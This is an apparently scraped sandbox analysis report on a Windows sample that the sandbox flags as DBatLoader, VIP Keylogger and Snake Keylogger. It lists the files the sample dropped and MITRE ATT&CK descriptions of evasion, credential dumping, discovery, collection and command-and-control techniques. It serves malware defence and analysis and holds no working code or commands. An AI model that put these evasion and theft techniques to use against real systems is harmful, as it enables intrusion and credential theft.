Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report yxU3AgeVTi.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DBatLoader

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\Public\Aiymwhpj.url

C:\Users\Public\AiymwhpjF.cmd

C:\Users\Public\Libraries\Aiymwhpj

C:\Users\Public\Libraries\Aiymwhpj.PIF

C:\Users\Public\Libraries\FX.cmd

C:\Users\Public\Libraries\NEO.cmd

C:\Users\Public\Libraries\jphwmyiA.pif

Static File Info

General

Windows Analysis Report
yxU3AgeVTi.exe

Function 02948BA8 Relevance: 47.2, APIs: 3, Strings: 23, Instructions: 1654
threadnativeinjectionCOMMON

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre